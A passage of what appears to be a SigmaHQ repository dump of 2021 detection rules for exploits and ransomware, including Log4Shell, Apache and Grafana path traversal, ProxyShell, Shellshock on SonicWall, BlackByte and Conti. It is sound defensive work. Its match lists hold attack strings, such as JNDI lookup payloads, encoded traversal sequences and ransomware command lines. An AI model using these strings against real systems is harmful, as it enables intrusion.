    "content": "title: LPE InstallerFileTakeOver PoC CVE-2021-41379\nid: 7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8\nstatus: test\ndescription: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2022-07-12\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: 'MsiInstaller'\n        Data|contains: 'test pkg'\n    condition: selection\nfalsepositives:\n    - Other MSI packages for which your admins have used that name\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41773/web_cve_2021_41773_apache_path_traversal.yml",
    "content": "title: CVE-2021-41773 Exploitation Attempt\nid: 3007fec6-e761-4319-91af-e32e20ac43f5\nstatus: test\ndescription: |\n  Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\n  An attacker could use a path traversal attack to map URLs to files outside the expected document root.\n  If files outside of the document root are not protected by \"require all denied\" these requests can succeed.\n  Additionally this flaw could leak the source of interpreted files like CGI scripts.\n  This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773\n    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782\n    - https://twitter.com/ptswarm/status/1445376079548624899\n    - https://twitter.com/h4x0r_dz/status/1445401960371429381\n    - https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml\n    - https://twitter.com/bl4sty/status/1445462677824761878\nauthor: daffainfo, Florian Roth\ndate: 2021-10-05\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-41773\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/cgi-bin/.%2e/'\n            - '/icons/.%2e/'\n            - '/cgi-bin/.%%32%65/'\n            - '/icons/.%%32%65/'\n            - '/cgi-bin/.%%%25%33'\n            - '/icons/.%%%25%33'\n        sc-status:\n            - 200\n            - 301\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42237/web_cve_2021_42237_sitecore_report_ashx.yml",
    "content": "title: Sitecore Pre-Auth RCE CVE-2021-42237\nid: 20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f\nstatus: test\ndescription: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx\nreferences:\n    - https://blog.assetnote.io/2021/11/02/sitecore-rce/\n    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-17\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-42237\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/sitecore/shell/ClientBin/Reporting/Report.ashx'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml",
    "content": "title: Potential CVE-2021-42278 Exploitation Attempt\nid: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f\nrelated:\n    - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a\n      type: similar\nstatus: test\ndescription: |\n    The attacker creates a computer object using those permissions with a password known to her.\n    After that she clears the attribute ServicePrincipalName on the computer object.\n    Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\nreferences:\n    - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-04-14\ntags:\n    - attack.credential-access\n    - attack.t1558.003\n    - cve.2021-42278\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-Kerberos-Key-Distribution-Center'  # Active Directory\n        EventID:\n            - 35 # PAC without attributes\n            - 36 # Ticket without a PAC\n            - 37 # Ticket without Requestor\n            - 38 # Requestor Mismatch\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml",
    "content": "title: Suspicious Computer Account Name Change CVE-2021-42287\nid: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466\nstatus: test\ndescription: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287\nreferences:\n    - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-22\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1036\n    - attack.t1098\n    - cve.2021-42287\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4781 # rename user\n        OldTargetUserName|contains: '$'\n    filter:\n        NewTargetUserName|contains: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42287/win_system_exploit_cve_2021_42287.yml",
    "content": "title: Potential CVE-2021-42287 Exploitation Attempt\nid: e80a0fee-1a62-4419-b31e-0d0db6e6013a\nrelated:\n    - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f\n      type: similar\nstatus: test\ndescription: |\n    The attacker creates a computer object using those permissions with a password known to her.\n    After that she clears the attribute ServicePrincipalName on the computer object.\n    Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\nreferences:\n    - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-04-14\ntags:\n    - attack.credential-access\n    - attack.t1558.003\n    - detection.emerging-threats\n    - cve.2021-42287\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Directory-Services-SAM  # Active Directory\n        EventID:\n            - 16990 # Object class and UserAccountControl validation failure\n            - 16991 # SAM Account Name validation failure\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42321/win_exchange_cve_2021_42321.yml",
    "content": "title: Possible Exploitation of Exchange RCE CVE-2021-42321\nid: c92f1896-d1d2-43c3-92d5-7a5b35c217bb\nstatus: test\ndescription: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321\nauthor: 'Florian Roth (Nextron Systems), @testanull'\ndate: 2021-11-18\nmodified: 2022-07-12\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: msexchange-management\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID:\n            - 6\n            - 8\n        Data|contains:\n            - 'Cmdlet failed. Cmdlet Get-App, '\n            - 'Task Get-App throwing unhandled exception: System.InvalidCastException:'\n    condition: selection\nfalsepositives:\n    - Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-43798/web_cve_2021_43798_grafana.yml",
    "content": "title: Grafana Path Traversal Exploitation CVE-2021-43798\nid: 7b72b328-5708-414f-9a2a-6a6867c26e16\nstatus: test\ndescription: Detects a successful Grafana path traversal exploitation\nreferences:\n    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/\n    - https://github.com/search?q=CVE-2021-43798\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-08\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-43798\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_traversal:\n        cs-uri-query|contains: '/../../../../../../../'\n        sc-status: 200\n    selection_plugins:\n        cs-uri-query|contains:\n            - '/public/plugins/live'\n            - '/public/plugins/icon'\n            - '/public/plugins/loki'\n            - '/public/plugins/text'\n            - '/public/plugins/logs'\n            - '/public/plugins/news'\n            - '/public/plugins/stat'\n            - '/public/plugins/mssql'\n            - '/public/plugins/mixed'\n            - '/public/plugins/mysql'\n            - '/public/plugins/tempo'\n            - '/public/plugins/graph'\n            - '/public/plugins/gauge'\n            - '/public/plugins/table'\n            - '/public/plugins/debug'\n            - '/public/plugins/zipkin'\n            - '/public/plugins/jaeger'\n            - '/public/plugins/geomap'\n            - '/public/plugins/canvas'\n            - '/public/plugins/grafana'\n            - '/public/plugins/welcome'\n            - '/public/plugins/xychart'\n            - '/public/plugins/heatmap'\n            - '/public/plugins/postgres'\n            - '/public/plugins/testdata'\n            - '/public/plugins/opentsdb'\n            - '/public/plugins/influxdb'\n            - '/public/plugins/barchart'\n            - '/public/plugins/annolist'\n            - '/public/plugins/bargauge'\n            - '/public/plugins/graphite'\n            - '/public/plugins/dashlist'\n            - '/public/plugins/piechart'\n            - '/public/plugins/dashboard'\n            - '/public/plugins/nodeGraph'\n            - '/public/plugins/alertlist'\n            - '/public/plugins/histogram'\n            - '/public/plugins/table-old'\n            - '/public/plugins/pluginlist'\n            - '/public/plugins/timeseries'\n            - '/public/plugins/cloudwatch'\n            - '/public/plugins/prometheus'\n            - '/public/plugins/stackdriver'\n            - '/public/plugins/alertGroups'\n            - '/public/plugins/alertmanager'\n            - '/public/plugins/elasticsearch'\n            - '/public/plugins/gettingstarted'\n            - '/public/plugins/state-timeline'\n            - '/public/plugins/status-history'\n            - '/public/plugins/grafana-clock-panel'\n            - '/public/plugins/grafana-simple-json-datasource'\n            - '/public/plugins/grafana-azure-monitor-datasource'\n    condition: all of selection*\nfalsepositives:\n    - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml",
    "content": "title: CVE-2021-44077 POC Default Dropped File\nid: 7b501acf-fa98-4272-aa39-194f82edc8a3\nstatus: test\ndescription: Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\n    - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\ntags:\n    - attack.execution\n    - cve.2021-44077\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/proc_creation_win_exploit_cve_2021_44228_vmware_horizon_log4j.yml",
    "content": "title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon\nid: 3eb91f0a-0060-424a-a676-59f5fdd75610\nstatus: test\ndescription: |\n    Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.\nreferences:\n    - https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability\n    - https://twitter.com/TheDFIRReport/status/1482078434327244805\n    - https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/\nauthor: '@kostastsale'\ndate: 2022-01-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-44228\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ws_TomcatService.exe'\n    filter_main_shells:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/web_cve_2021_44228_log4j.yml",
    "content": "title: Log4j RCE CVE-2021-44228 Generic\nid: 5ea8faa8-db8b-45be-89b0-151b84c82702\nstatus: test\ndescription: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\n    - https://news.ycombinator.com/item?id=29504755\n    - https://github.com/tangxiaofeng7/apache-log4j-poc\n    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n    - https://github.com/YfryTchsGD/Log4jAttackSurface\n    - https://twitter.com/shutingrz/status/1469255861394866177?s=21\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-10\nmodified: 2022-02-06\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '${jndi:ldap:/'\n        - '${jndi:rmi:/'\n        - '${jndi:ldaps:/'\n        - '${jndi:dns:/'\n        - '/$%7bjndi:'\n        - '%24%7bjndi:'\n        - '$%7Bjndi:'\n        - '%2524%257Bjndi'\n        - '%2F%252524%25257Bjndi%3A'\n        - '${jndi:${lower:'\n        - '${::-j}${'\n        - '${jndi:nis'\n        - '${jndi:nds'\n        - '${jndi:corba'\n        - '${jndi:iiop'\n        - 'Reference Class Name: foo'\n        - '${${env:BARFOO:-j}'\n        - '${::-l}${::-d}${::-a}${::-p}'\n        - '${base64:JHtqbmRp'\n        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n        - '${${lower:j}ndi:'\n        - '${${upper:j}ndi:'\n        - '${${::-j}${::-n}${::-d}${::-i}:'\n    filter:\n        - 'w.nessus.org/nessus'\n        - '/nessus}'\n    condition: keywords and not filter\nfalsepositives:\n    - Vulnerability scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/web_cve_2021_44228_log4j_fields.yml",
    "content": "title: Log4j RCE CVE-2021-44228 in Fields\nid: 9be472ed-893c-4ec0-94da-312d2765f654\nstatus: test\ndescription: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\n    - https://news.ycombinator.com/item?id=29504755\n    - https://github.com/tangxiaofeng7/apache-log4j-poc\n    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n    - https://github.com/YfryTchsGD/Log4jAttackSurface\n    - https://twitter.com/shutingrz/status/1469255861394866177?s=21\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-44228\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-user-agent|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    # selection2:\n        # user-agent|contains:\n            # - '${jndi:ldap:/'\n            # - '${jndi:rmi:/'\n            # - '${jndi:ldaps:/'\n            # - '${jndi:dns:/'\n            # - '/$%7bjndi:'\n            # - '%24%7bjndi:'\n            # - '$%7Bjndi:'\n            # - '%2524%257Bjndi'\n            # - '%2F%252524%25257Bjndi%3A'\n            # - '${jndi:${lower:'\n            # - '${::-j}${'\n            # - '${jndi:nis'\n            # - '${jndi:nds'\n            # - '${jndi:corba'\n            # - '${jndi:iiop'\n            # - 'Reference Class Name: foo'\n            # - '${${env:BARFOO:-j}'\n            # - '${::-l}${::-d}${::-a}${::-p}'\n            # - '${base64:JHtqbmRp'\n            # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            # - '${${lower:j}ndi:'\n            # - '${${upper:j}ndi:'\n            # - '${${::-j}${::-n}${::-d}${::-i}:'\n    selection3:\n        cs-uri-query|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    selection4:\n        cs-referer|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    condition: 1 of selection*\nfalsepositives:\n    - Vulnerability scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/ProxyShell-Exploit/web_exchange_proxyshell.yml",
    "content": "title: Exchange ProxyShell Pattern\nid: 23eee45e-933b-49f9-ae1b-df706d2d52ef\nstatus: test\ndescription: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2231\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nauthor: Florian Roth (Nextron Systems), Rich Warren\ndate: 2021-08-07\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        sc-status: 401\n    selection_1_auto:\n        cs-uri-query|contains: '/autodiscover.json'\n    selection_1_uri:\n        cs-uri-query|contains:\n            - '/powershell'\n            - '/mapi/nspi'\n            - '/EWS'\n            - 'X-Rps-CAT'\n    selection_poc:\n        sc-status: 401\n        cs-uri-query|contains:\n            # since we don't know how it will appear in the log files, we'll just use all versions\n            - 'autodiscover.json?@'\n            - 'autodiscover.json%3f@'\n            - '%3f@foo.com'\n            - 'Email=autodiscover/autodiscover.json'\n            - 'json?@foo.com'\n    condition: all of selection_1* or selection_poc\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/ProxyShell-Exploit/web_exchange_proxyshell_successful.yml",
    "content": "title: Successful Exchange ProxyShell Attack\nid: 992be1eb-e5da-437e-9a54-6d13b57bb4d8\nstatus: test\ndescription: Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2231\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nauthor: Florian Roth (Nextron Systems), Rich Warren\ndate: 2021-08-09\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_auto:\n        cs-uri-query|contains: '/autodiscover.json'\n    selection_uri:\n        cs-uri-query|contains:\n            - '/powershell'\n            - '/mapi/nspi'\n            - '/EWS'\n            - 'X-Rps-CAT'\n    selection_success:\n        sc-status:\n            - 200\n            - 301\n    condition: selection_auto and selection_uri and selection_success\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml",
    "content": "title: Suspicious RazerInstaller Explorer Subprocess\nid: a4eaf250-7dc1-4842-862a-5e71cd59a167\nstatus: test\ndescription: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM\nreferences:\n    - https://twitter.com/j0nh4t/status/1429049506021138437\n    - https://streamable.com/q2dsji\nauthor: Florian Roth (Nextron Systems), Maxime Thiebaut\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1553\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\RazerInstaller.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384' # System\n    filter_main_razer:\n        Image|startswith: 'C:\\Windows\\Installer\\Razer\\Installer\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - User selecting a different installation folder (check for other sub processes of this explorer.exe process)\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml",
    "content": "title: Potential SystemNightmare Exploitation Attempt\nid: c01f7bd6-0c1d-47aa-9c61-187b91273a16\nstatus: test\ndescription: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM\nreferences:\n    - https://github.com/GossiTheDog/SystemNightmare\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-11\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'printnightmare.gentilkiwi.com'\n            - ' /user:gentilguest '\n            - 'Kiwi Legit Printer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/VisualDoor-Exploit/README.md",
    "content": "# VisualDoor: SonicWall SSL-VPN Exploit\n\n## Summary\n\nSonicWall \"Virtual Office\" SSL-VPN Products ship an old version of Bash that's vulnerable to ShellShock, and are therefore vulnerable to an unauthenticated remote code execution (as a “nobody” user) via the `/cgi-bin/jarrewrite.sh` URL.\n\n## Rules\n\n- [SonicWall SSL/VPN Jarrewrite Exploitation](./web_sonicwall_jarrewrite_exploit.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/VisualDoor-Exploit/web_sonicwall_jarrewrite_exploit.yml",
    "content": "title: SonicWall SSL/VPN Jarrewrite Exploitation\nid: 6f55f047-112b-4101-ad32-43913f52db46\nstatus: test\ndescription: Detects exploitation attempts of the SonicWall Jarrewrite Exploit\nreferences:\n    - https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/\n    - https://github.com/darrenmartyn/VisualDoor\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-25\nmodified: 2023-04-27\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/cgi-bin/jarrewrite.sh'\n        cs-user-agent|contains:\n            - ':;'\n            - '() {'\n            - '/bin/bash -c'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml",
    "content": "title: Potential BlackByte Ransomware Activity\nid: 999e8307-a775-4d5f-addc-4855632335be\nstatus: test\ndescription: Detects command line patterns used by BlackByte ransomware in different operations\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2023-02-08\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1485\n    - attack.t1498\n    - attack.t1059.001\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|startswith: 'C:\\Users\\Public\\'\n        CommandLine|contains: ' -single '\n    selection_2:\n        CommandLine|contains:\n            - 'del C:\\Windows\\System32\\Taskmgr.exe'\n            - ';Set-Service -StartupType Disabled $'\n            - 'powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('\n            - ' do start wordpad.exe /p '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/BlackByte/registry_set_win_malware_blackbyte_privesc_registry.yml",
    "content": "title: Blackbyte Ransomware Registry\nid: 83314318-052a-4c90-a1ad-660ece38d276\nstatus: test\ndescription: |\n    Detects specific windows registry modifications made by BlackByte ransomware variants.\n    BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.\n    This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\nauthor: frack113\ndate: 2022-01-24\nmodified: 2025-10-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject:\n            - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy'\n            - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections'\n            - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem\\LongPathsEnabled'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml",
    "content": "title: Conti Volume Shadow Listing\nid: 7b30e0a7-c675-4b24-8a46-82fa67e2433d\nstatus: test\ndescription: Detects a command used by conti to find volume shadow backups\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\ntags:\n    - attack.t1587.001\n    - attack.resource-development\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'vssadmin list shadows'\n            - 'log.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml",
